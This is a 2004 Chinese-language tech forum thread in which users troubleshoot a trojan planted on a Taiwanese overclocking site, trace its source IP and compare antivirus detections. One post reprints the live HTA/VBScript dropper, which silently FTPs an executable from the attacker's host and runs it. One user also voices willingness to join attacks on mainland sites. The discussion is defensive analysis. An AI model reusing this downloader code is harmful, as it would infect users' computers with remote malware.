PCDVD數位科技討論區
PCDVD數位科技討論區   註冊 常見問題 標記討論區為已讀

回到   PCDVD數位科技討論區 > 其他群組 > 疑難雜症區
帳戶
密碼
 

  回應
 
主題工具
Serron
Power Member
 
Serron的大頭照
 

加入日期: Jul 2001
您的住址: 魔幻武林大會
文章: 504
引用:
Originally posted by 特地來找你
不是執行"ftp"程式,而是該強行植入的木馬其中的一個叫做"ftp",並非一般的ftp程式~

連這次也算的話,小弟一共中過5次這隻木馬,雖 然解這隻木馬不難,但實在解到很煩了!

....... ╮(╯_╰)╭ ,另外3721(網路實名)小弟已經忘了中過多少次~

小弟上網的習慣,向來都把ie的"安全性"調最低,以便讀取最完整的網頁資料,不會因為

怕木馬,而讓自己上網習慣有所改變~

國內若有人對大陸網站發動"訪問",小弟應會參加一腳,給對岸的俗辣一點顏色看看,讓

對岸知道tw不是好惹的~


再來就看看超頻者天堂怎麼做啦....~


可是他要執行:
File Version : 5.1.2600.0 (xpclient.xxxxxx-xxxx)
File Description : File Transfer Program (ftp.exe)
File Path : C:\WINDOWS\system32\ftp.exe

File Path : C:\WINDOWS\system32\mshat.exe
     
      
__________________
我的第一台 DVD-R 燒錄機
UnLimited Power
舊 2004-07-17, 02:01 PM #11
回應時引用此文章
Serron離線中  
u8526425
Elite Member
 

加入日期: Oct 2002
文章: 4,803
友站IIS網管有看到的話
建議參考這裡
儘快查修一下
http://support.microsoft.com/?kbid=871277
 
__________________
人性的醜陋就是,會在無權、無勢、善良的人身上挑毛病,卻在有權、有勢、缺德的人身上找優點。當無權、無勢、善良的人受到傷害的時候,還會站在所謂的道德制高點上,假惺惺地勸說無權、無勢、善良的人,一定要忍耐,一定要大度。
舊 2004-07-17, 04:42 PM #12
回應時引用此文章
u8526425現在在線上  
jimi74
Major Member
 
jimi74的大頭照
 

加入日期: Aug 2003
您的住址: 北縣
文章: 158
怪怪的,一進網頁馬上就會被導引進這個位址:61.163.238.XX
當然是禁止
舊 2004-07-17, 06:31 PM #13
回應時引用此文章
jimi74離線中  
u8526425
Elite Member
 

加入日期: Oct 2002
文章: 4,803
引用:
Originally posted by jimi74
怪怪的,一進網頁馬上就會被導引進這個位址:61.163.238.XX
當然是禁止

你用nslook去查zhu.7xi.org
(Serron網友po的程式碼中載明)
主機即為61.163.238.51
是大陸過來的東西
http://www.apnic.net/apnic-bin/whoi...h=61.163.238.51
只有16個ip
應該是個體戶

其name server是218.244.47.5
是北京的Feihua Communication Technology Co.Ltd.
http://www.apnic.net/apnic-bin/whoi...ch=218.244.47.5

確實可疑
建議暫時不要去閒晃
__________________
人性的醜陋就是,會在無權、無勢、善良的人身上挑毛病,卻在有權、有勢、缺德的人身上找優點。當無權、無勢、善良的人受到傷害的時候,還會站在所謂的道德制高點上,假惺惺地勸說無權、無勢、善良的人,一定要忍耐,一定要大度。
舊 2004-07-17, 06:54 PM #14
回應時引用此文章
u8526425現在在線上  
jackeric
Power Member
 
jackeric的大頭照
 

加入日期: Aug 2002
您的住址: 台南縣
文章: 583
引用:
Originally posted by 特地來找你
不是執行"ftp"程式,而是該強行植入的木馬其中的一個叫做"ftp",並非一般的ftp程式~

連這次也算的話,小弟一共中過5次這隻木馬,雖 然解這隻木馬不難,但實在解到很煩了!

....... ╮(╯_╰)╭ ,另外3721(網路實名)小弟已經忘了中過多少次~

小弟上網的習慣,向來都把ie的"安全性"調最低,以便讀取最完整的網頁資料,不會因為

怕木馬,而讓自己上網習慣有所改變~

國內若有人對大陸網站發動"訪問",小弟應會參加一腳,給對岸的俗辣一點顏色看看,讓

對岸知道tw不是好惹的~


再來就看看超頻者天堂怎麼做啦....~


3721(網路實名)----這是木馬???
能解釋嗎 我也有中這一個東西
__________________
EPOX-8RDA+
AND 1700+ OC 2400+
金士頓-DDR400 512MBx3
VGA GeForceFX 5600
HD wd 80G*1 wd 250*4 S160G*2
CD-Rw asus 52x24x52
DVD LITEON16x
power 海韻400 w
case 成吉斯汗 6大四小
TV Tuner Leadtek Winfast TV2000XP Deluxe
LCD PHILIPS 150B3
UPS : PowerCom King Pro KIN-525AP


舊 2004-07-17, 07:51 PM #15
回應時引用此文章
jackeric離線中  
zoodong
Major Member
 

加入日期: Apr 2004
文章: 159
引用:
Originally posted by vict1
我的KAV有抓出來說

這是誤判嗎


+1..我的kav也有抓到
舊 2004-07-18, 02:45 AM #16
回應時引用此文章
zoodong離線中  
壹伍貳參
*停權中*
 
壹伍貳參的大頭照
 

加入日期: Dec 2003
文章: 391
Symantec AntiVirus 無法發現
舊 2004-07-18, 03:05 AM #17
回應時引用此文章
壹伍貳參離線中  
darksnow
Golden Member
 

加入日期: Aug 2002
文章: 2,806
ng.test內容

<HTA:APPLICATION caption="no" border="none" showInTaskBar="yes"
windowState="minimize">
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script language="VBScript">
Dim fs, t
Set fs = CreateObject("Scripting.FileSystemObject")
Set t = fs.CreateTextFile("163.txt",True)
t.WriteLine("open 61.163.238.51")
t.WriteLine("nh")
t.WriteLine("nh")
t.WriteLine("lcd c:\")
t.WriteLine("bin")
t.WriteLine("get pangzi05.exe")
t.WriteLine("bye")
t.Close
wsh.Run "ftp -s:163.txt",0,true
wsh.Run "c:\pangzi05.exe"
fs.DeleteFile "163.txt",true
window.close
window.close
</script>
舊 2004-07-18, 03:24 AM #18
回應時引用此文章
darksnow離線中  
壹伍貳參
*停權中*
 
壹伍貳參的大頭照
 

加入日期: Dec 2003
文章: 391
掃描類型: 即時防護掃描

事件: 發現病毒!

病毒名稱:Bloodhound.Packed

檔案: C:\pangzi05.exe

位置: 隔離所

電腦: #@%^%#

使用者: ABCAAKLAK

採取的動作: 清除 失敗 : 隔離 成功 : 拒絕存取



病毒在超頻者天堂網站
剛才更新病毒碼...OK
舊 2004-07-18, 03:48 AM #19
回應時引用此文章
壹伍貳參離線中  
hjfrank
*停權中*
 
hjfrank的大頭照
 

加入日期: Feb 2000
您的住址: 台灣
文章: 6,822
引用:
Originally posted by jackeric
3721(網路實名)----這是木馬??? 能解釋嗎 我也有中這一個東西






不能算是。
舊 2004-07-18, 04:26 AM #20
回應時引用此文章
hjfrank離線中  


    回應


POPIN
主題工具

發表文章規則
不可以發起新主題
不可以回應主題
不可以上傳附加檔案
不可以編輯您的文章

vB 代碼打開
[IMG]代碼打開
HTML代碼關閉



所有的時間均為GMT +8。 現在的時間是08:26 AM.


vBulletin Version 3.0.1
powered_by_vbulletin 2025。